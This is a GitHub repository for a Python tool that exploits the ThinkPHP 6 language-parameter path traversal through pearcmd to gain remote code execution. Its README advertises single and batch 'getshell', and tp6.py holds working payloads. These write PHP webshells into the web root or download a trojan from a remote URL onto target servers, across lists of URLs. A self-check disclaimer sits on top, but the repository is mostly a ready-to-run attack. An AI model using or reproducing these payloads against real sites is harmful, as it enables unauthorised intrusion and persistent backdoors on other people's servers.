├── README.md
├── images
└── logo.jpg
├── requirments.txt
├── tp6.py
└── url.txt
/README.md:
--------------------------------------------------------------------------------
1 |
2 |
3 | ThinkPhp6LangRceTools
4 |
5 |
6 |
7 |
8 |
9 |
一个用于自检Thinkphp多语言漏洞的工具
15 |
16 |
17 |
18 |
19 |
20 |
该工具由7coin安全团队强力驱动
22 |
23 |
24 |
25 |
26 | ## 免责任声明
27 |
28 | 该工具仅供学习和参考。因用于其他用途而产生不良后果,作者不承担任何法律责任。
29 |
30 | 本工具仅能在取得足够合法授权的企业安全建设中使用,在使用本工具过程中,您应确保自己所有行为符合当地的法律法规。 如您在使用本工具的过程中存在任何非法行为,您将自行承担所有后果,本工具所有开发者和所有贡献者不承担任何法律及连带责任。 除非您已充分阅读、完全理解并接受本协议所有条款,否则,请您不要安装并使用本工具。 您的使用行为或者您以其他任何明示或者默示方式表示接受本协议的,即视为您已阅读并同意本协议的约束。
31 |
32 |
33 |
34 | ## ThinkPhp6LangRce
35 |
36 | 一个用于自检Thinkphp多语言漏洞并且可以一键rce的工具,日后再做相关完善。
37 |
38 | **注意**
39 |
40 | - 本项目仅用于学习交流,请勿用于非法用途
41 | - 如用于非法用法,产生的后果与本项目无关
42 |
43 |
44 |
45 | ## Usage:
46 |
47 | ```py
48 | Usage: "usage:python tp6.py -u/--url -f/--file ","version = 1.0.1"
49 |
50 | Options:
51 | -h, --help show this help message and exit
52 | -u URL, --url=URL Enter the url to be detected
53 | -f FILEPATH, --file=FILEPATH
54 | Enter a list of urls to detect
55 | -c CHOOSE, --choose=CHOOSE
56 | Choose poc detection or exp detection
57 | -r REMOTEURL, --remoteurl=REMOTEURL
58 | enter a remote link
59 | -v V software version
60 |
61 | ```
62 |
63 |
64 |
65 | ## 漏洞复现
66 |
67 | docker pull 7coinsec/thinkphp6013_lang_on
68 |
69 | docker run -it -d -p 12345:80 7coinsec/thinkphp6013_lang_on
70 |
71 |
72 |
73 | ## Example:
74 |
75 | 漏洞自检测:
76 |
77 | 单个poc检测:`python3 tp6.py -u "http://example.com" -c poc`
78 |
79 | 批量poc检测:`python3 tp6.py -f url.txt -c poc`
80 |
81 | Getshell: 注:选择 -r/--remote参数,可以从远程下载木马,这在默认getshell失败时可以尝试
82 |
83 | 单个getshell:`python3 tp6.py -u "http://example.com" -c exp`
84 |
85 | 批量getshell:`python3 tp6.py -f url.txt -c exp `
86 |
87 | 
88 |
89 |
90 |
91 | ## 关注我们
92 |
93 | 
--------------------------------------------------------------------------------
/images/logo.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/7coinSec/ThinkPhp6LangRceTools/81078dd17a5352b65c92a2c1a9bc1ec2361b8086/images/logo.jpg
--------------------------------------------------------------------------------
/requirments.txt:
--------------------------------------------------------------------------------
1 | optparse
2 | requests
3 | os
--------------------------------------------------------------------------------
/tp6.py:
--------------------------------------------------------------------------------
1 | import optparse
2 | import requests
3 | import os
4 | import random
5 |
6 |
7 | headers = {
8 | 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9',
9 | 'Accept-Language': 'zh-CN,zh;q=0.9',
10 | 'Cache-Control': 'max-age=0',
11 | 'Cookie': 'think_lang=zh-cn',
12 | 'Proxy-Connection': 'keep-alive',
13 | 'Upgrade-Insecure-Requests': '1',
14 | 'sec-ch-ua': '"Google Chrome";v="107", "Chromium";v="107", "Not=A?Brand";v="24"',
15 | 'sec-ch-ua-mobile': '?0',
16 | 'sec-ch-ua-platform': '"Windows NT 10.0"',
17 | 'sec-fetch-dest': 'document',
18 | 'sec-fetch-mode': 'navigate',
19 | 'sec-fetch-site': 'same-origin',
20 | 'sec-fetch-user': '?1',
21 | 'user-agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36',
22 | }
23 |
24 | def singlePoc(url):
25 | requrl = url+"/index.php?lang=../../../../../public/index"
26 |
27 | try:
28 | req = requests.get(url=requrl, headers=headers, timeout=10)
29 | if(req.status_code == 500):
30 | print(url+"存在该漏洞")
31 | return "success"
32 | else:
33 | print(url+"不存在该漏洞")
34 | except Exception:
35 | print(url+"访问时出现错误")
36 |
37 |
38 | def manyPoc(filepath):
39 | payload = "/index.php?lang=../../../../../public/index"
40 |
41 | with open(filepath,"r") as f:
42 | urlList = f.read().splitlines()
43 | for url in urlList:
44 | requrl = url + payload
45 | try:
46 | req = requests.get(url=requrl, headers=headers, timeout=10)
47 | if (req.status_code == 500):
48 | print(url + " 存在该漏洞")
49 | continue
50 | else:
51 | print(url + " 不存在该漏洞")
52 | except Exception:
53 | print(url + " 访问时出现错误")
54 |
55 |
56 | def singleExp(url,remoteUrl):
57 | payload = "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+install+-R+.+{}".format(remoteUrl)
58 | requrl = url + payload #漏洞url
59 | hz = str(remoteUrl).split("/")
60 | shellUrl = url+"/tmp/pear/download/{}".format(hz[-1]) #webshell-Url
61 | try:
62 | req = requests.get(url=requrl, headers=headers, timeout=10)
63 | shellreq = requests.get(url=shellUrl, headers=headers, timeout=10)
64 | if shellreq.status_code == 200:
65 | print("webshell address :",shellUrl)
66 | else:
67 | print("write shell fail | {}".format(url))
68 | except Exception:
69 | print("Invalid usage")
70 |
71 |
72 | def manyExp(filepath,remoteUrl):
73 | payload = "/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+install+-R+.+{}".format(remoteUrl)
74 | hz = str(remoteUrl).split("/")
75 | with open(filepath,"r") as f:
76 | urlList = f.read().splitlines()
77 | for url in urlList:
78 | requrl = url + payload # 漏洞url
79 | shellUrl = url + "/tmp/pear/download/{}".format(hz[-1]) # webshell-Url
80 | try:
81 | req = requests.get(url=requrl, headers=headers, timeout=10)
82 | shellreq = requests.get(url=shellUrl, headers=headers, timeout=10)
83 | if shellreq.status_code == 200:
84 | print("webshell address :", shellUrl)
85 | else:
86 | print("write shell fail | {}".format(url))
87 | except Exception:
88 | print("Invalid usage")
89 |
90 | def osSingleExp(url):
91 | sz = "abcdefghijklmnopqrstuvwxyz"
92 | shellName = str(random.randint(1000,10000)) + sz[random.randint(0,10)]
93 | payload = "curl {}/index.php?lang=../../../../../../../../usr/local/lib/php/pearcmd&+config-create+/+/var/www/html/public/{}.php".format(url,shellName)
94 | os.system(payload)
95 | shellUrl = url+"/"+shellName+".php"
96 | if requests.get(url=shellUrl, headers=headers, timeout=10).status_code == 200:
97 | print("webshell address :", shellUrl)
98 | else:
99 | print("write shell fail | {}".format(url))
100 |
101 | # os.system()
102 |
103 | def osAllExp():
104 | print("2")
105 |
106 |
107 | def logo():
108 | print('''=========================================
109 | ______ _____ _ _____
110 | |____ / ____| (_) / ____|
111 | / / | ___ _ _ __ | (___ ___ ___
112 | / /| | / _ \\| | '_ \\ \\___ \\ / _ \\/ __|
113 | / / | |___| (_) | | | | |____) | __/ (__
114 | /_/ \\_____\\___/|_|_| |_|_____/ \\___|\\___|
115 |
116 |
117 | ThinkPHP Lang 漏洞自检工具 by 7CoinSec
118 | ========================================= ''')
119 |
120 |
121 | def main():
122 | logo()
123 |
124 | usage = '"usage:python %prog -u/--url -f/--file ","version = 1.0.1"'
125 | parse = optparse.OptionParser(usage)
126 | parse.add_option("-u", "--url", dest="Url", type=str, help="Enter the url to be detected")
127 | parse.add_option("-f", "--file", dest="FilePath", type=str, help="Enter a list of urls to detect")
128 | parse.add_option("-c", "--choose", dest="choose", default="poc", type=str, help="Choose poc detection or exp detection")
129 | parse.add_option("-r", "--remoteurl", dest="remoteUrl", default=None, type=str, help="enter a remote link")
130 | parse.add_option("-v", help="software version")
131 | options, args = parse.parse_args()
132 |
133 | if options.choose == "poc":
134 | if options.Url != None:
135 | singlePoc(options.Url)
136 | if options.FilePath != None:
137 | manyPoc(options.FilePath)
138 |
139 | elif options.choose == "exp":
140 | if options.Url != None and options.remoteUrl != None:
141 | singleExp(options.Url, options.remoteUrl)
142 | elif options.FilePath != None and options.remoteUrl != None:
143 | manyExp(options.FilePath, options.remoteUrl)
144 | elif options.Url != None and options.remoteUrl == None:
145 | osSingleExp(options.Url)
146 | elif options.FilePath != None and options.remoteUrl == None:
147 | osAllExp()
148 | elif options.Url != None:
149 | print("Please enter the remote Trojan address, example: python3 tp6.py -c exp -u 'http://example.com' -r/--remote \"http://example.com/shell.php\"")
150 | elif options.FilePath != None:
151 | print("Please enter the remote Trojan address, example: python3 tp6.py -c exp -f filePath -r/--remote \"http://example.com/shell.php\"")
152 |
153 | else:
154 | print("Please choose poc detection or exp detection, example: python3 tp6.py -c poc/exp -u 'http://example.com'")
155 |
156 |
157 |
158 |
159 | if __name__ == '__main__':
160 | main()
--------------------------------------------------------------------------------
/url.txt:
--------------------------------------------------------------------------------
1 | http://test.com
2 | http://fuck.om
3 | http://iiiii.com
4 | http://test1.com
5 | http://127.0.0.1:12345/
--------------------------------------------------------------------------------